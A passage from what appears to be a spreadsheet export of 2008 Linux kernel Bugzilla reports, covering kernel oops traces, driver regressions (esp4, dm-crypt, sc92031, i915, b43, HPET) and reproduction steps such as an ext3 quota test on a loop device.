packet_recvmsg+0x179/0x1a1 [af_packet] [&lt;c0285aca&gt;] sock_recvmsg+0xcf/0xf3 [&lt;c0285baa&gt;] sock_sendmsg+0xbc/0xde [&lt;c012a95b&gt;] autoremove_wake_function+0x0/0x37 [&lt;c0114ce1&gt;] task_rq_lock+0x29/0x50 [&lt;c0166ecf&gt;] core_sys_select+0x1b3/0x2bd [&lt;c0115283&gt;] __wake_up+0x32/0x42 [&lt;c0211bf0&gt;] tty_wakeup+0x2d/0x54 [&lt;c0218764&gt;] pty_unthrottle+0x12/0x1d [&lt;dfc7bdaf&gt;] ppp_asynctty_receive+0x26a/0x687 [ppp_async] [&lt;c0115283&gt;] __wake_up+0x32/0x42 [&lt;c0115283&gt;] __wake_up+0x32/0x42 [&lt;c0211b57&gt;] tty_ldisc_deref+0x46/0x69 [&lt;c0213ac2&gt;] tty_write+0x1a7/0x1b3 [&lt;c01674e1&gt;] sys_select+0xe4/0x1ab [&lt;c01027e6&gt;] sysenter_past_esp+0x5f/0x85 ======================= Code: 75 ac 83 86 40 01 00 00 01 8b 65 b0 bb ea ff ff ff e9 d2 fc ff ff 89 c2 8b 45 a8 e8 58 dd 74 e0 8b 4d a8 8b 51 50 e9 41 ff ff ff &lt;0f&gt; 0b eb fe 55 57 56 53 83 ec 10 89 c6 8b a8 e4 00 00 00 85 ed EIP: [&lt;dfb3d50b&gt;] esp_input+0x3b2/0x3b6 [esp4] SS:ESP 0068:dd71d9a4 Kernel panic - not syncing: Fatal exception in interrupt ------------------------------------------------------------------------------ 2.6.24.3: kernel BUG at include/linux/skbuff.h:948! invalid opcode: 0000 [#1] SMP Modules linked in: esp4 ah4 xfrm4_mode_tunnel ppp_synctty ppp_async crc_ccitt pp p_generic slhc deflate zlib_deflate geode_aes aes_i586 aes_generic blowfish des_ generic cbc ecb blkcipher sha256_generic sha1_generic crypto_null af_key af_pack et ipt_ULOG xt_state xt_tcpudp iptable_filter ipt_MASQUERADE iptable_nat nf_nat nf_conntrack_ipv4 nf_conntrack ip_tables x_tables binfmt_misc dm_mod sr_mod cdro m generic ide_core evdev e1000 pata_marvell intel_agp e1000e ehci_hcd uhci_hcd a gpgart sg usbcore unix Pid: 4, comm: ksoftirqd/0 Not tainted (2.6.24.3-1 #1) EIP: 0060:[&lt;dfab450b&gt;] EFLAGS: 00010283 CPU: 0 EIP is at esp_input+0x3b2/0x3b6 [esp4] EAX: 00000579 EBX: 00000000 ECX: 00000010 EDX: dcc6f540 ESI: 00000005 EDI: 00000014 EBP: de845e74 ESP: de845e10 DS: 007b ES: 007b FS: 00d8 GS: 0000 SS: 0068 Process ksoftirqd/0 (pid: 4, ti=de844000 task=de829ab0 task.ti=de844000) Stack: 00000000 000249f0 de845e00 dcc6f540 dcfa0a00 de845e10 de3b69c0 dcfa5f40 0000000c 00000580 00000000 dccb8840 00000001 00000008 00000000 dcfa5f40 dcfa5f68 00000000 dcf3e580 00000000 de083540 04050002 dcfa0a00 00000032 Call Trace: [&lt;c02dce5a&gt;] xfrm4_rcv_encap+0xba/0x426 [&lt;df847475&gt;] nf_nat_adjust+0x0/0x33 [iptable_nat] [&lt;c02a6666&gt;] nf_iterate+0x56/0x7a [&lt;c02a66ff&gt;] nf_hook_slow+0x4d/0xbe [&lt;c02ac18a&gt;] ip_local_deliver_finish+0x0/0x1f8 [&lt;c02dd1e1&gt;] xfrm4_rcv+0x1b/0x1f [&lt;c02ac27f&gt;] ip_local_deliver_finish+0xf5/0x1f8 [&lt;c02abf48&gt;] ip_rcv_finish+0xe8/0x32a [&lt;c02ac658&gt;] ip_rcv+0x1e3/0x265 [&lt;c02abe60&gt;] ip_rcv_finish+0x0/0x32a [&lt;c02ac475&gt;] ip_rcv+0x0/0x265 [&lt;c028fecb&gt;] netif_receive_skb+0x298/0x3b7 [&lt;dfae37b7&gt;] ppp_receive_nonmp_frame+0x2c7/0x709 [ppp_generic] [&lt;c02924ef&gt;] process_backlog+0x63/0xc4 [&lt;c0291f83&gt;] net_rx_action+0x78/0x139 [&lt;dfaaab02&gt;] ppp_async_process+0x1b/0x5e [ppp_async] [&lt;c011e6c2&gt;] __do_softirq+0x72/0xdf [&lt;c011e92f&gt;] ksoftirqd+0x0/0xcf [&lt;c011e766&gt;] do_softirq+0x37/0x39 [&lt;c011e985&gt;] ksoftirqd+0x56/0xcf [&lt;c012a753&gt;] kthread+0x34/0x55 [&lt;c012a71f&gt;] kthread+0x0/0x55 [&lt;c0103437&gt;] kernel_thread_helper+0x7/0x10 ======================= Code: 75 ac 83 86 40 01 00 00 01 8b 65 b0 bb ea ff ff ff e9 d2 fc ff ff 89 c2 8b 45 a8 e8 68 6e 7d e0 8b 4d a8 8b 51 50 e9 41 ff ff ff &lt;0f&gt; 0b eb fe 55 57 56 53 83 ec 10 89 c6 8b a8 e4 00 00 00 85 ed EIP: [&lt;dfab450b&gt;] esp_input+0x3b2/0x3b6 [esp4] SS:ESP 0068:de845e10 Kernel panic - not syncing: Fatal exception in interrupt</t>
  </si>
  <si>
    <t>Task blocked for more than 120 seconds</t>
  </si>
  <si>
    <t>2.6.24, 2.6.25-rc6</t>
  </si>
  <si>
    <t>2008-04-01 22:30 UTC</t>
  </si>
  <si>
    <t>2008-05-01 19:24 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: N/A Earliest failing kernel version: 2.6.25-rc6 Distribution: Debian/Suse Hardware Environment: Dell XPS M1210 Laptop Dual Core CPU 2.0 Ghz RAM - 2GB HDD - SATA 60 GB + USB 120 GB Self-Powered Software Environment: DM + DM-Crypt + LVM2 Problem Description: &gt; On my laptop, doing heavy C++ compilations in parallel with -j3 (this &gt; is a dual core) often generates the following trace: &gt; &gt; INFO: task g++:25119 blocked for more than 120 seconds. &gt; "echo 0 &gt; /proc/sys/kernel/hung_task_timeout_secs" disables this &gt; message. &gt; g++ D c03916c0 0 25119 25118 &gt; ecfef200 00200086 c038ef18 c03916c0 c03916c0 f77b2230 f77b2378 c17fa6c0 &gt; 00000000 f89817bc f7486280 000000ff f7a1eb20 00000000 00000000 00000000 &gt; c17fa6c0 00000000 d1401e9c c17f0408 c02a2aa1 d1401e94 c0147100 c02a2c93 &gt; Call Trace: &gt; [&lt;f89817bc&gt;] dm_table_unplug_all+0x1e/0x2e [dm_mod] &gt; [&lt;c02a2aa1&gt;] io_schedule+0x1b/0x24 &gt; [&lt;c0147100&gt;] sync_page+0x33/0x36 &gt; [&lt;c02a2c93&gt;] __wait_on_bit+0x33/0x58 &gt; [&lt;c01470cd&gt;] sync_page+0x0/0x36 &gt; [&lt;c01472fd&gt;] wait_on_page_bit+0x59/0x60 &gt; [&lt;c012cf7b&gt;] wake_bit_function+0x0/0x3c &gt; [&lt;c014e20d&gt;] truncate_inode_pages_range+0x238/0x29f &gt; [&lt;c014e27d&gt;] truncate_inode_pages+0x9/0xc &gt; [&lt;f8c67187&gt;] ext2_delete_inode+0x12/0x6e [ext2] &gt; [&lt;f8c67175&gt;] ext2_delete_inode+0x0/0x6e [ext2] &gt; [&lt;c0170ea5&gt;] generic_delete_inode+0x8f/0xf3 &gt; [&lt;c0170819&gt;] iput+0x60/0x62 &gt; [&lt;c0169aa5&gt;] do_unlinkat+0xb7/0xf9 &gt; [&lt;c0113a3e&gt;] do_page_fault+0x1fa/0x4dc &gt; [&lt;c0104822&gt;] sysenter_past_esp+0x5f/0x85 &gt; ======================= &gt; &gt; This is with 2.6.25-rc6 (SMP) and has been present, as far as I can &gt; remember, since the beginning of the 2.6.25-rc series. It is not &gt; always reproducible, but the trace is always the same. &gt; &gt; My filesystem is stored on a ext3 (rw,noatime) dm_crypt'd partition &gt; leaving in a LVM volume. &gt; &gt; % lsmod | grep dm | grep -v ' 0 *$' &gt; dm_crypt 14340 1 &gt; crypto_blkcipher 18308 6 ecb,cbc,dm_crypt &gt; dm_mod 53008 26 dm_crypt,dm_mirror,dm_snapshot &gt; &gt; Here is the code I have in dm-table.o: &gt; &gt; 00001042 &lt;dm_table_unplug_all&gt;: &gt; 1042: 56 push %esi &gt; 1043: 53 push %ebx &gt; 1044: 8b 98 a0 00 00 00 mov 0xa0(%eax),%ebx &gt; 104a: 8d b0 a0 00 00 00 lea 0xa0(%eax),%esi &gt; 1050: eb 10 jmp 1062 &lt;dm_table_unplug_all+0x20&gt; &gt; 1052: 8b 43 10 mov 0x10(%ebx),%eax &gt; 1055: 8b 40 5c mov 0x5c(%eax),%eax &gt; 1058: 8b 40 34 mov 0x34(%eax),%eax &gt; 105b: e8 fc ff ff ff call 105c &lt;dm_table_unplug_all+0x1a&gt; &gt; 1060: 8b 1b mov (%ebx),%ebx &gt; 1062: 8b 03 mov (%ebx),%eax &gt; 1064: 0f 1f 40 00 nopl 0x0(%eax) &gt; 1068: 39 f3 cmp %esi,%ebx &gt; 106a: 75 e6 jne 1052 &lt;dm_table_unplug_all+0x10&gt; &gt; 106c: 5b pop %ebx &gt; 106d: 5e pop %esi &gt; 106e: c3 ret &gt; &gt; The symbol in 105b call is, after relocation, blk_unplug. &gt; &gt; It there anything else I can do to help debugging this? &gt; &gt; Sam Steps to reproduce: Steps to reproduce is not consistent. The last time I reported, I wasn't able to reproduce the bug on a different setup (An IBM xSeries server). One point to notice is that, for both us users, it has been reproducible on the laptops. I'm filing this bugzilla report because now the user count is 2. And the report is identical. This was earlier discussed here in this thread: https://www.redhat.com/archives/dm-devel/2008-March/msg00014.html</t>
  </si>
  <si>
    <t>sc92031 does not create a device link in sysfs</t>
  </si>
  <si>
    <t>2008-04-02 07:30 UTC</t>
  </si>
  <si>
    <t>Thomas Scheiblauer</t>
  </si>
  <si>
    <t>2012-05-18 10:41 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: Distribution: Gentoo Hardware Environment: x86, x86_64 Software Environment: Problem Description: there is no 'device' link created for the sc92031 nic in sysfs under its respective directory '/sys/class/net/eth?' thus making it impossible to search up the device tree using udev. In my special case, persistent udev net rules cannot be generated by the respective gentoo udev script due to its dependency upon the udev 'DEVICES' key which cannot be determined because of the impossibility to search up the tree. Steps to reproduce: 1) install silan sc92031 (or realtek 8139D) nic in your pc 2) recompile and install kernel 2.6.24 (sysfs enabled) with sc92031 driver either in-kernel or as a module 3) reboot or load sc92031 module 4) make sure sysfs is mounted on /sys 5) look into the respective '/sys/class/net/eth?' directory</t>
  </si>
  <si>
    <t>2.6.25-rc5.git4 regression PS/2 mouse not detected/working</t>
  </si>
  <si>
    <t>2.6.25-rc5.git4</t>
  </si>
  <si>
    <t>2008-04-02 10:33 UTC</t>
  </si>
  <si>
    <t>2008-07-19 23:05 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.25-rc5.git4 regression PS/2 mouse not detected/working Submitter : Yanko Kaneti &lt;yaneti@declera.com&gt; Date : 2008-04-02 10:59 References : http://lkml.org/lkml/2008/4/2/210 Handled-By : Dmitry Torokhov &lt;dmitry.torokhov@gmail.com&gt; Handled-By : Balaji Rao &lt;balajirrao@gmail.com&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>rc6+ regression - backlight reset to 0 on boot after 7c0ea45be4f114d85ee35caeead8e1660699c46f</t>
  </si>
  <si>
    <t>2.6.25-rc6-7c0ea45be4f114d85ee35caeead8e1660699c46f</t>
  </si>
  <si>
    <t>2008-04-02 15:41 UTC</t>
  </si>
  <si>
    <t>2008-04-07 03:48 UTC</t>
  </si>
  <si>
    <t>Subject : rc6+ regression - backlight reset to 0 on boot after 7c0ea45be4f114d85ee35caeead8e1660699c46f Submitter : Andrey Borzenkov &lt;arvidjaar@mail.ru&gt; Date : 2008-04-02 22:53 References : http://lkml.org/lkml/2008/4/2/366 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>DMA-API.txt has wrong argument types</t>
  </si>
  <si>
    <t>2.6.25-rc8-git2</t>
  </si>
  <si>
    <t>2008-04-03 06:56 UTC</t>
  </si>
  <si>
    <t>2008-04-29 10:41 UTC</t>
  </si>
  <si>
    <t>Problem Description: DMA-API.txt has wrong argument types for e.g. pci_map_single struct device *, should be struct pci_dev *</t>
  </si>
  <si>
    <t>kernel 2.6.24-1 doesn't detect my laptop correctly</t>
  </si>
  <si>
    <t>2.6.24-1</t>
  </si>
  <si>
    <t>2008-04-03 10:28 UTC</t>
  </si>
  <si>
    <t>Alexei Kouznetsov</t>
  </si>
  <si>
    <t>2008-10-24 23:05 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.22-3 Earliest failing kernel version: 2.6.24-1 Distribution: debian testing (lenny) Hardware Environment: Toshiba Satellite L40-17R laptop Software Environment: gnome Problem Description: After upgading to kernel 2.6.24-1 I noticed, that my system started to dump the same lines to /var/log/acpid, slowing down overall performance. Here is beginning of log: [Thu Apr 3 19:36:36 2008] starting up [Thu Apr 3 19:36:36 2008] 75 rules loaded [Thu Apr 3 19:36:40 2008] client connected from 3185[107:110] [Thu Apr 3 19:36:40 2008] 1 client rule loaded [Thu Apr 3 19:36:43 2008] received event "hotkey ATKD 0000005f 00000000" [Thu Apr 3 19:36:43 2008] notifying client 3185[107:110] [Thu Apr 3 19:36:43 2008] executing action "/etc/acpi/asus-wireless.sh on" [Thu Apr 3 19:36:43 2008] BEGIN HANDLER MESSAGES [Thu Apr 3 19:36:43 2008] END HANDLER MESSAGES [Thu Apr 3 19:36:43 2008] action exited with status 0 [Thu Apr 3 19:36:43 2008] completed event "hotkey ATKD 0000005f 00000000" [Thu Apr 3 19:36:43 2008] received event "hotkey ATKD 0000005f 00000001" [Thu Apr 3 19:36:43 2008] notifying client 3185[107:110] [Thu Apr 3 19:36:43 2008] executing action "/etc/acpi/asus-wireless.sh on" [Thu Apr 3 19:36:43 2008] BEGIN HANDLER MESSAGES ... and so on. dmesg shows correct detection of Toshiba laptop: ACPI: SSDT 3F7B8CC0, 04E6 (r1 PmRef CpuPm 3000 INTL 20051117) ACPI: DMI detected: Toshiba ACPI: PM-Timer IO Port: 0x808 But later it fails to determine exact model and chooses Asus: Asus Laptop ACPI Extras version 0.30 unsupported model T20, trying default values send /proc/acpi/dsdt to the developers Steps to reproduce: Just login.</t>
  </si>
  <si>
    <t>Oops while reading /proc/ioports or /proc/iomem</t>
  </si>
  <si>
    <t>2.6.25-rc5-git3</t>
  </si>
  <si>
    <t>2008-04-03 13:48 UTC</t>
  </si>
  <si>
    <t>2008-04-06 12:38 UTC</t>
  </si>
  <si>
    <t>Subject : Oops while reading /proc/ioports or /proc/iomem Submitter : Jan Kara &lt;jack@suse.cz&gt; Date : 2008-04-03 15:25 References : http://lkml.org/lkml/2008/4/3/149 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>ext4 compile error on m68k</t>
  </si>
  <si>
    <t>2.6.25-rc8-git</t>
  </si>
  <si>
    <t>2008-04-05 03:30 UTC</t>
  </si>
  <si>
    <t>2009-01-17 19:15 UTC</t>
  </si>
  <si>
    <t>Subject : ext4 compile error on m68k Submitter : Adrian Bunk &lt;bunk@kernel.org&gt; References : http://lkml.org/lkml/2008/4/5/19 Caused-By : Aneesh Kumar K.V &lt;aneesh.kumar@linux.vnet.ibm.com&gt; commit aa02ad67d9b308290fde390682cd039b29f7ab85</t>
  </si>
  <si>
    <t>[&gt;=2.6.23][BUG] Oops on power</t>
  </si>
  <si>
    <t>2008-04-05 05:48 UTC</t>
  </si>
  <si>
    <t>Aditya Naga Sanjeevi</t>
  </si>
  <si>
    <t>2008-06-12 01:31 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.21 Earliest failing kernel version: 2.6.23 Distribution: Fedora 8 Hardware Environment: Toshiba Satellite L35 Software Environment: Fedora 8 Problem Description: Kernel Oops when switching from A/c Power to Batter Power or when booting while running on a battery. System continues to work after switching from A/c power to batter power, however commands like kill, poweroff, X, etc doesn't work. Steps to reproduce: disconnect power while working or run on a battery</t>
  </si>
  <si>
    <t>DRI is not working with 945GME</t>
  </si>
  <si>
    <t>2.6.25-rc8</t>
  </si>
  <si>
    <t>2008-04-05 07:50 UTC</t>
  </si>
  <si>
    <t>Alexander Oltu</t>
  </si>
  <si>
    <t>2008-04-07 10:06 UTC</t>
  </si>
  <si>
    <t>While loading i915.ko module Im getting: [ 72.275559] [drm] Initialized drm 1.1.0 20060810 [ 75.193794] [drm:drm_init] [ 75.193794] [drm:drm_get_dev] [ 75.193794] ACPI: PCI Interrupt 0000:00:02.0[A] -&gt; GSI 16 (level, low) -&gt; IRQ 16 [ 75.193794] PCI: Setting latency timer of device 0000:00:02.0 to 64 [ 75.193794] [drm:drm_addmap_core] offset = 0x00003000, size = 0x00000008, typ e = 1 [ 75.193794] [drm:drm_lastclose] [ 75.193794] [drm:drm_lastclose] driver lastclose completed [ 75.193794] [drm:drm_lastclose] lastclose completed [ 75.193794] DRM: Fill_in_dev failed. [ 75.193794] ACPI: PCI interrupt for device 0000:00:02.0 disabled ls -l /dev/dri/ total 0 Kernel version 2.6.24.4 was working fine and I had working 3D acceleration. It is laptop HP 530.</t>
  </si>
  <si>
    <t>DMA-mapping.txt code examples have undeclared variables</t>
  </si>
  <si>
    <t>2.6.25-rc8-git4</t>
  </si>
  <si>
    <t>2008-04-05 09:34 UTC</t>
  </si>
  <si>
    <t>2008-04-29 10:53 UTC</t>
  </si>
  <si>
    <t>Problem Description: the following code examples do not declare variable dev: 470 struct pci_dev *pdev = mydev-&gt;pdev; 471 dma_addr_t dma_handle; 472 void *addr = buffer-&gt;ptr; 473 size_t size = buffer-&gt;len; 474 475 dma_handle = pci_map_single(dev, addr, size, direction); 476 477 and to unmap it: 478 479 pci_unmap_single(dev, dma_handle, size, direction); 490 struct pci_dev *pdev = mydev-&gt;pdev; 491 dma_addr_t dma_handle; 492 struct page *page = buffer-&gt;page; 493 unsigned long offset = buffer-&gt;offset; 494 size_t size = buffer-&gt;len; 495 496 dma_handle = pci_map_page(dev, page, offset, size, direction); 497 498 ... 499 500 pci_unmap_page(dev, dma_handle, size, direction);</t>
  </si>
  <si>
    <t>b43: PHY transmission error</t>
  </si>
  <si>
    <t>2.6.25.1</t>
  </si>
  <si>
    <t>2008-04-05 10:39 UTC</t>
  </si>
  <si>
    <t>2010-02-14 17:35 UTC</t>
  </si>
  <si>
    <t>Problem Description: Hello, I often get the error message "b43-phy0 ERROR: PHY transmission error" in my dmesg. I'm very close most time to my WLAN Router and I don't know what should fail there :) Informations about my HW and SW could be found here: http://bugzilla.kernel.org/show_bug.cgi?id=10398</t>
  </si>
  <si>
    <t>Quotas problem on ext3 FS mounted with data=journal</t>
  </si>
  <si>
    <t>2008-04-05 23:19 UTC</t>
  </si>
  <si>
    <t>2009-01-17 19:32 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: none Earliest failing kernel version: 2.6.25-rc8 Distribution: Gentoo Hardware Environment: x86 (both 32 and 64 bits) Software Environment: GNU Problem Description: New quota data is not read (from aquota.user file) after quota enabling on ext3 FS mounted with "data=journal". NOTE: data=ordered (default) and data=writeback - are OK. The problem is with quota v2 (old format is not tested). Steps to reproduce: The problem is always recreatable. Just create an ext3 FS and mount it with "data=journal". Here is the howto: # dd if=/dev/zero of=TEST.ext3.fs bs=1M count=1 seek=99 # mkfs.ext3 TEST.ext3.fs # mkdir -p /mnt/1 # modprobe loop # mount TEST.ext3.fs /mnt/1 -ousrquota,data=journal,loop # quotacheck /dev/loop0 # quotaon -a // Set quotas for some user (john) both soft and hard (to something like 80000) # edquota john // Put some data into the FS # cp -a /usr/src/linux/kernel /mnt/1 // Owned by user john # chown -R john:john /mnt/1/kernel # quota john Disk quotas for user john (uid 1003): Filesystem blocks quota limit grace files quota limit grace /dev/loop0 40248 80000 80000 412 0 0 // Disable quotas # quotaoff -a // Set quotas to just another value (like 90000) # edquota john // Enable quotas # quotaon -a // And check the user again # quota john Disk quotas for user john (uid 1003): Filesystem blocks quota limit grace files quota limit grace /dev/loop0 40248 80000 80000 412 0 0 Problem: the quotas is not changed. If: - the FS is mounted by default (with data=ordered) - or with data=writeback - or "edquota john" is running with enabled quotas on the FS the problem is not arising.</t>
  </si>
  <si>
    <t>Omair Eshkenazi</t>
  </si>
  <si>
    <t>HPET interrupt is missing on HAIER H53</t>
  </si>
  <si>
    <t>2.6.24.1, 2.6.24.3, 2.6.25-rc8</t>
  </si>
  <si>
    <t>2008-04-06 19:44 UTC</t>
  </si>
  <si>
    <t>Anielkis Herrera</t>
  </si>
  <si>
    <t>Latest working kernel version: - Earliest failing kernel version: 2.6.24.1 Distribution: Gentoo, Ubuntu, Ututo, Sabayon Hardware Environment: lspci: 00:00.0 Host bridge: ATI Technologies Inc Unknown device 5a31 (rev 01) 00:01.0 PCI bridge: ATI Technologies Inc RS480 PCI Bridge 00:13.0 USB Controller: ATI Technologies Inc IXP SB400 USB Host Controller (rev 80) 00:13.1 USB Controller: ATI Technologies Inc IXP SB400 USB Host Controller (rev 80) 00:13.2 USB Controller: ATI Technologies Inc IXP SB400 USB2 Host Controller (rev 80) 00:14.0 SMBus: ATI Technologies Inc IXP SB400 SMBus Controller (rev 82) 00:14.1 IDE interface: ATI Technologies Inc IXP SB400 IDE Controller (rev 80) 00:14.2 Audio device: ATI Technologies Inc IXP SB4x0 High Definition Audio Controller (rev 01) 00:14.3 ISA bridge: ATI Technologies Inc IXP SB400 PCI-ISA Bridge (rev 80) 00:14.4 PCI bridge: ATI Technologies Inc IXP SB400 PCI-PCI Bridge (rev 80) 01:05.0 VGA compatible controller: ATI Technologies Inc RC410 [Radeon Xpress 200M] 02:00.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 10) 02:01.0 CardBus bridge: Ricoh Co Ltd RL5c476 II (rev b3) 02:01.1 SD Host controller: Ricoh Co Ltd R5C822 SD/SDIO/MMC/MS/MSPro Host Adapter (rev 17) 02:01.2 System peripheral: Ricoh Co Ltd R5C592 Memory Stick Bus Host Adapter (rev 08) cpuinfo: processor : 0 vendor_id : GenuineIntel cpu family : 6 model : 14 model name : Intel(R) Core(TM) Duo CPU T2350 @ 1.86GHz stepping : 12 cpu MHz : 1866.805 cache size : 2048 KB physical id : 0 siblings : 2 core id : 0 cpu cores : 2 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 10 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx constant_tsc arch_perfmon bts pni monitor est tm2 xtpr bogomips : 3960.74 clflush size : 64 processor : 1 vendor_id : GenuineIntel cpu family : 6 model : 14 model name : Intel(R) Core(TM) Duo CPU T2350 @ 1.86GHz stepping : 12 cpu MHz : 1866.805 cache size : 2048 KB physical id : 0 siblings : 2 core id : 1 cpu cores : 2 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 10 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx constant_tsc arch_perfmon bts pni monitor est tm2 xtpr bogomips : 3733.90 clflush size : 64 Software Environment: # emerge --info Portage 2.1.4.4 (default-linux/x86/2007.0/desktop, gcc-4.1.2, glibc-2.6.1-r0, 2.6.24-gentoo-r4 i686) ================================================================= System uname: 2.6.24-gentoo-r4 i686 Intel(R) Core(TM) Duo CPU T2350 @ 1.86GHz Timestamp of tree: Thu, 03 Apr 2008 01:45:04 +0000 app-shells/bash: 3.2_p17-r1 dev-java/java-config: 1.3.7, 2.1.4 dev-lang/python: 2.5.1-r5 dev-python/pycrypto: 2.0.1-r6 sys-apps/baselayout: 1.12.11.1 sys-apps/sandbox: 1.2.18.1-r2 sys-devel/autoconf: 2.13, 2.61-r1 sys-devel/automake: 1.4_p6, 1.5, 1.7.9-r1, 1.8.5-r3, 1.9.6-r2, 1.10 sys-devel/binutils: 2.18-r1 sys-devel/gcc-config: 1.4.0-r4 sys-devel/libtool: 1.5.26 virtual/os-headers: 2.6.23-r3 ACCEPT_KEYWORDS="x86" CBUILD="i686-pc-linux-gnu" CFLAGS="-O2 -march=prescott -pipe -mfpmath=sse -msse -msse2 -msse3 -mmmx -fno-gcse -fthread-jumps -fexpensive-optimizations -frerun-loop-opt -DREENABLE_FAST_EXECUTION " CHOST="i686-pc-linux-gnu" CONFIG_PROTECT="/etc /var/lib/hsqldb" CONFIG_PROTECT_MASK="/etc/env.d /etc/env.d/java/ /etc/fonts/fonts.conf /etc/gconf /etc/revdep-rebuild /etc/splash /etc/terminfo /etc/texmf/web2c /etc/udev/rules.d" CXXFLAGS="-O2 -march=prescott -pipe -mfpmath=sse -msse -msse2 -msse3 -mmmx -fno-gcse -fthread-jumps -fexpensive-optimizations -frerun-loop-opt -DREENABLE_FAST_EXECUTION " DISTDIR="/usr/portage/distfiles" FEATURES="distlocks metadata-transfer nodoc parallel parallel-fetch sfperms unmerge-orphans userfetch" GENTOO_MIRRORS="http://gentoo.prod.uci.cu" LANG="es_ES.utf8" LC_ALL="es_ES.utf8" LINGUAS="es en" MAKEOPTS="-j3" PKGDIR="/usr/portage/packages" PORTAGE_RSYNC_OPTS="--recursive --links --safe-links --perms --times --compress --force --whole-file --delete --stats --timeout=180 --exclude=/distfiles --exclude=/local --exclude=/packages" PORTAGE_TMPDIR="/var/tmp" PORTDIR="/usr/portage" USE="X aac aalib acl acpi aiglx alsa apm applet asf avahi avi bash-completion berkdb bindist bitmap-fonts branding bzip2 cairo cdda cdr cli cracklib crypt cups curl dba dbus device-mapper directfb djvu dri dv dvb dvd dvdr dvdread dvi eds emboss encode esd evo fam fbcon ffmpeg firefox flac foomaticdb fortran freetype gd gdbm ggi gif gnome gnutls gphoto2 gpm gstreamer gtk gtk2 hal i8x0 iconv imlib ipv6 isdnlog ithreads jack jikes jpeg kerberos krb4 lame ldap libg++ libnotify libwww lzo mad matroska mcal midi mikmod mmx motif mozilla moznocalendar moznomail moznoxmlterm mp3 mpeg mudflap nas ncurses networkmanager nfs nls nntp nptl nptlonly ogg oggvorbis opengl openmp oss pam pcmcia pcre pdf pdflib perl plotutils png pppd python qt3support quicktime readline reflection remote samba scanner screen sdl session slang sni snmp speex spell spl sse sse2 ssl ssse3 suexec svg tcltk tcpd tetex theora threads tiff tk tracker truetype truetype-fonts type1-fonts unicode usb v4l vcd vim-syntax vlm vorbis win32codecs winbind x264 x86 xattr xine xinerama xml xml2 xorg xulrunner xv xvid xvmc yv12 zlib" ALSA_CARDS="ali5451 als4000 atiixp atiixp-modem bt87x ca0106 cmipci emu10k1 emu10k1x ens1370 ens1371 es1938 es1968 fm801 hda-intel intel8x0 intel8x0m maestro3 trident usb-audio via82xx via82xx-modem ymfpci" ALSA_PCM_PLUGINS="adpcm alaw asym copy dmix dshare dsnoop empty extplug file hooks iec958 ioplug ladspa lfloat linear meter mulaw multi null plug rate route share shm softvol" APACHE2_MODULES="actions alias auth_basic auth_digest authn_anon authn_dbd authn_dbm authn_default authn_file authz_dbm authz_default authz_groupfile authz_host authz_owner authz_user autoindex cache dav dav_fs dav_lock dbd deflate dir disk_cache env expires ext_filter file_cache filter headers ident imagemap include info log_config mem_cache mime mime_magic negotiation rewrite setenvif so speling status unique_id userdir usertrack vhost_alias" APACHE2_MPMS="worker" ELIBC="glibc" INPUT_DEVICES="mouse keyboard synaptics" KERNEL="linux" LCD_DEVICES="bayrad cfontz cfontz633 glk hd44780 lb216 lcdm001 mtxorb ncurses text" LINGUAS="es en" USERLAND="GNU" VIDEO_CARDS="v4l radeon fbdev fglrx" Unset: CPPFLAGS, CTARGET, EMERGE_DEFAULT_OPTS, INSTALL_MASK, LDFLAGS, PORTAGE_COMPRESS, PORTAGE_COMPRESS_FLAGS, PORTAGE_RSYNC_EXTRA_OPTS Problem Description: I test some GNU/Linux distributions and kernel versions, but all have the same problem, them can't boot without acpi=off(even the install CDs), I tried all the combinations of the options can be passed to the kernel that are in acpi's boot.c without acpi=off the lastest lines i got are: checking if this procesor honours the WP bit even in supervisor mode... Ok hpet clock event registered spurious 8259A interrupt: IRQ7. and it stop there, I wait 20 minutes but it was there.. :( Steps to reproduce: 1- boot without the option acpi=off</t>
  </si>
  <si>
    <t>x86: tsc prevent time going backwards broke suspend</t>
  </si>
  <si>
    <t>2008-04-07 02:08 UTC</t>
  </si>
  <si>
    <t>2008-04-09 02:28 UTC</t>
  </si>
  <si>
    <t>PC unable to resume after suspend to ram. This patch make this regression for me: commit 47001d603375f857a7fab0e9c095d964a1ea0039 Author: Thomas Gleixner &lt;tglx@linutronix.de&gt; Date: Tue Apr 1 19:45:18 2008 +0200 x86: tsc prevent time going backwards We already catch most of the TSC problems by sanity checks, but there is a subtle bug which has been in the code for ever. This can cause time jumps in the range of hours. This was reported in: http://lkml.org/lkml/2007/8/23/96 and http://lkml.org/lkml/2008/3/31/23 I was able to reproduce the problem with a gettimeofday loop test on a dual core and a quad core machine which both have sychronized TSCs. The TSCs seems not to be perfectly in sync though, but the kernel is not able to detect the slight delta in the sync check. Still there exists an extremly small window where this delta can be observed with a real big time jump. So far I was only able to reproduce this with the vsyscall gettimeofday implementation, but in theory this might be observable with the syscall based version as well. CPU 0 updates the clock source variables under xtime/vyscall lock and CPU1, where the TSC is slighty behind CPU0, is reading the time right after the seqlock was unlocked. The clocksource reference data was updated with the TSC from CPU0 and the value which is read from TSC on CPU1 is less than the reference data. This results in a huge delta value due to the unsigned subtraction of the TSC value and the reference value. This algorithm can not be changed due to the support of wrapping clock sources like pm timer. The huge delta is converted to nanoseconds and added to xtime, which is then 